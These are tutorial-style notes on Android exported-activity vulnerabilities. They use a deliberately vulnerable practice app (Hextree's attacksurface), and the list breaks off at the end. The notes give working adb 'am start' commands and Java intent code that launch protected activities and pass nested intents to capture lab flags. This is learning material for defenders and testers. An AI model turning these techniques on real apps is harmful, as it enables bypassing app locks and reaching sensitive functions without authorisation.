Activities

Activity is basically a single screen of a app where user can interact with it.

For better understanding also read Android Activity LifeCycle.

If Activity is sensitive and shouldn't be accessible by 3rd party apps, then it should be set with exported="false" flag.

Example of Some Vulnerable scenarios & their exploitation

1. If there is some app lock feature which doesn't allow sensitive activities to be open without entering pin, but sensitive activity has exported="true"

adb shell "am start -n io.hextree.attacksurface/io.hextree.attacksurface.activities.Flag1Activity"

1. If activity is exported and expecting an action

adb shell "am start -n io.hextree.attacksurface/io.hextree.attacksurface.activities.Flag2Activity -a io.hextree.action.GIVE_FLAG"

1. If activity is exported, expecting action with data uri

adb shell "am start -n io.hextree.attacksurface/io.hextree.attacksurface.activities.Flag3Activity -a io.hextree.action.GIVE_FLAG -d 'https://app.hextree.io/map/android'"

1. If Parcelable (kind of serializable) object is needed to be passed as intent, we need to make own application which interacts with vulnerable application to send Parcelable object as intent. ADB doesn't support sending of complex data natively.

Intent innerInnerIntent = new Intent();
innerInnerIntent.putExtra("reason","back");

Intent innerIntent = new Intent();
innerIntent.putExtra("nextIntent",innerInnerIntent);
innerIntent.putExtra("return",42);

Intent outerIntent = new Intent();
outerIntent.setClassName("io.hextree.attacksurface","io.hextree.attacksurface.activities.Flag5Activity");
outerIntent.putExtra("android.intent.extra.INTENT",innerIntent);
startActivity(outerIntent);

1. If onNewIntent is used in vulnerable application, then we must pass the intent using Intent.FLAG_ACTIVITY_CLEAR_TOP|Intent.FLAG_ACTIVITY_SINGLE_TOP flags, so that intent data is sent to already opened vulnerable application activity, instead of creating new activity.

1. If Exported Activity is expecting some extras